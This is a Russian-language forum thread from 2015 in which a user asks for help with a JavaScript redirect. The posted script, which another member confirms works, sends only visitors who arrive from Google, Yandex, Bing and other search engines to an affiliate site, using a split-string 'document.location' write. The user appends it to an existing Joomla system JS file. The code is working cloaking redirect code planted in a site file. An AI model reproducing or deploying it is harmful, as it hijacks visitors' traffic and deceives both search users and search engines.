Старый 08.06.2015, 01:26   #1
CHEBURNATOR
 
Аватар для CHEBURNATOR
 
Регистрация: 01.06.2015
Сообщений: 5
Репутация: -1
По умолчанию Скрипт редиректа Javascript

Доброго времени суток, уважаемые форумчане.
Сломал голову уже в поиске рабочего java скрипта для редиректа.
Задача скрипта - перенаправлять поисковый траф.
При прямом переходе - открывается сайт, при заходе с гугла редирект.
На просторах интернета нашел следующий Java:
PHP код:
function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('<script language="javascript">docu'+'ment.location="http://Сайт-нашой-партнерки-куда-лить-трафф.ru/"</s'+'cript>')}else{document.write('.')}}R(); 
но увы, работать не хочет.
Подскажите, возможно ошибки в нем. Или есть более удачный вариант скрипта?
Ну или хотя бы где копать. Спасибо!
CHEBURNATOR вне форума   Ответить с цитированием
Старый 08.06.2015, 15:23   #2
CHEBURNATOR
 
Аватар для CHEBURNATOR
 
Регистрация: 01.06.2015
Сообщений: 5
Репутация: -1
По умолчанию

Путем экспериментов выявил, что скрипт все таки рабочий.
Я его неправильно вызываю на главной странице судя по всему.
Делаю так - вставляю эту часть кода как есть в один из ява скриптов, которые на главной странице ызваются аля <script src="/media/system/js/ххх.js" type="text/javascript"></script>
Не работает.
В чем может быть проблема? Спасибо
CHEBURNATOR вне форума   Ответить с цитированием
Старый 08.06.2015, 15:42   #3
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

скрипт рабочий, работает если подключить через src или если просто в теге <script>
faza02 вне форума   Ответить с цитированием
Старый 08.06.2015, 16:49   #4
CHEBURNATOR
 
Аватар для CHEBURNATOR
 
Регистрация: 01.06.2015
Сообщений: 5
Репутация: -1
По умолчанию

Странно: скрипт вроде бы так и вызвается если я правильно понял.
Вот строка вызова на главной индес странице:
<script src="/media/system/js/ххх.js" type="text/javascript"></script>
При чем даже если все в том скрипте вычистить и оставить только мой, все равно не работает.
При чем этот же скрипт на главной странице просто в тегах "<script>" работает на ура.
CMS Joomla. Куда копать? спасибо.
CHEBURNATOR вне форума   Ответить с цитированием
Старый 08.06.2015, 16:52   #5
CHEBURNATOR
 
Аватар для CHEBURNATOR
 
Регистрация: 01.06.2015
Сообщений: 5
Репутация: -1
По умолчанию

То есть фактически я путь на главной и не менял, просто дописав свою строку скрипта в существующий.
Но редирект не работает, да и просто снеся этот файл явы на сайте тоже ничего не меняется.
Может что то не подключено?
CHEBURNATOR вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd. Перевод: zCarot